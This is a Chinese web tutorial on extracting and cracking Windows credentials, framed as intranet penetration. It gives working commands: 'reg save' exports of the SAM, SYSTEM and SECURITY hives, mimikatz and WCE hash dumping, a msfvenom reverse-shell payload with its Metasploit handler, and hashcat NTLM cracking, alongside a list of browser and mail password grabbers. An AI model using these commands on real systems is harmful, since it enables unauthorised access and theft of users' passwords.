当前位置:首页 > 实用技巧 >

windows 密码是什么(强制清除开机登录密码win7)

来源:原点资讯(www.yd166.com)时间:2023-05-02 01:02:26作者:YD166手机阅读>>

本文只是简单的讲明密码获取和破解

具体的操作细节均以模糊或具体代码混淆等方式避开

如有兴趣请自行研究,本文不做细说~~~

获取思路:

Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~

  • 通过0day直接获得权限;通过工具(WCE)或者漏洞(MS08-067溢出获得system权限)
  • 内网环境下通过嗅探扫描探测,暴力破解获取系统密码
  • 本地直接获得密码(读取系统system文件下的config所有文件逐一分析)

windows 密码是什么,强制清除开机登录密码win7(1)

密码获取工具:

gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……

Quarks PwDump:

是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。

Quarks PwDump -dh1 // 导出本地哈希值 Quarks PwDump -dhdc // 导出内存中域账户哈希值 Quarks PwDump -dhd // 导出域哈希值(指定NTDS文件)

WCE:

是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一

wce -a //获取所有账户哈希值

reg命令:导出密码文件

通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中

reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive

命令执行后将会将文件保存在本地~

PowerShell获取:

PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码

MSF反弹hashdump及mimikatz获取:

通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~

  • 生成反弹木马:

> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe

  • MSF使用反弹处理模块

> use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST 192.168.2.0 > set LPORT 443 > exploit

  • 提权操作……

其它小工具

下列小工具在Windows平台运行就会获得相关的用户凭证……

mailpv:获取mail密码

mspass:获取MSN密码

pst_password:获取Outlook密码

IE PV:获取IE浏览器缓存密码

各类浏览器密码获取工具

passwordfox:获取Firefox浏览器凭证

chromepass:获取谷歌浏览器凭证

无线网络密码获取工具

远程桌面密码获取:

rdpv —— cmdkey/list —— netpass.exe

破解密码哈希值

在线破解:

  • CMD5官网
  • ophCrack在线破解

ophcrack破解:

导入哈希值,加载Tables,执行Crack~

hashcat破解:

最流行的、最快的密码破解工具

破解:

将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:

hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username

-m 1000 表示破解密码类型为NTLM

-a 0 表示采用字典破解

-o [feilname].txt 表示将破解后的文件输出到指定的文件中

--remove win.hash 表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解

password.lst 密码字典文件

物理获取密码

获取SAM和SYSTEM文件

文件通常在C:\Windows\System32\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件

导入文件

使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~

破解哈希密码

导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解

栏目热文

windows初始密码是什么(怎样绕过电脑开机密码)

windows初始密码是什么(怎样绕过电脑开机密码)

一、服务器系统版本介绍windows服务器系统:win2000 win2003 win2008 win2012linux...

2023-05-02 00:32:23查看全文 >>

2022射手姻缘(2023射手女感情)

2022射手姻缘(2023射手女感情)

有情人终成眷属,是一件多么美好的事!单身的你,想必也期待着自己有朝一日可以脱单!今天小精灵就告诉你2022下半年,最有机...

2023-05-02 00:39:40查看全文 >>

射手座和什么星座最配当朋友(能把射手座吃得死死的星座)

射手座和什么星座最配当朋友(能把射手座吃得死死的星座)

火象星座的射手座,出生于初冬,天生自带阳光积极属性,足以穿透冰雪的寒冷。射手座具有很强的感染力,总能把快乐带给别人。他们...

2023-05-02 00:34:40查看全文 >>

2022射手喜事(2022射手的孽缘)

2022射手喜事(2022射手的孽缘)

狮子座狮子座的人,在2020年里是踌躇满志,因为他们本来就拥有很强大的自律性,做事情也讲究计划,保持着认真的态度,相信自...

2023-05-02 00:28:59查看全文 >>

发动机有渗油痕迹一定是漏油吗(发动机容易渗油漏油的部位)

发动机有渗油痕迹一定是漏油吗(发动机容易渗油漏油的部位)

发动机是汽车的“三大件”之一。但车子在用久了后,经常会发现有漏油的现象,很多车主因此担心是不是发动机故障了。事实上,发动...

2023-05-02 01:03:52查看全文 >>

windows 刚进去怎么改密码(windows怎么进去命令)

windows 刚进去怎么改密码(windows怎么进去命令)

我们在使用windows系统的时候,为了安全起见,一般都会给电脑上一层保险,就是设置开机密码。有的会将电脑的开机密码设...

2023-05-02 00:47:37查看全文 >>

windows软件设置密码(windows如何设置界面密码)

windows软件设置密码(windows如何设置界面密码)

电脑上的文件想要加密该怎么设置呢?我们在使用的电脑工作或者学习时,文件这么多,总有一些比较隐私或重要的文件,只希望自己能...

2023-05-02 00:34:55查看全文 >>

windows密码查看工具(windows密码修改记录查询)

windows密码查看工具(windows密码修改记录查询)

前面介绍过wce,这里再分享三个比较常用的类似工具:pwdump、fgdump、mimikatz这三个工具都能在kali...

2023-05-02 00:52:24查看全文 >>

桂o车牌是哪里的车牌(桂o是哪里的车牌号码)

桂o车牌是哪里的车牌(桂o是哪里的车牌号码)

小编说在广西生活这么久,见过那么多的车牌号,但你知道桂A、桂B...桂R是啥意思吗?A是省会,B是该省第二大城市,C是该...

2023-05-02 00:31:06查看全文 >>

桂d还有哪些好车牌(桂b是什么档次的车牌)

桂d还有哪些好车牌(桂b是什么档次的车牌)

每个省区的各个城市都有对应的车牌首字母,如果一个省区下设的城市很多,就会出现民众对地区车牌号码认知不清晰的情况出现。今天...

2023-05-02 00:45:55查看全文 >>

文档排行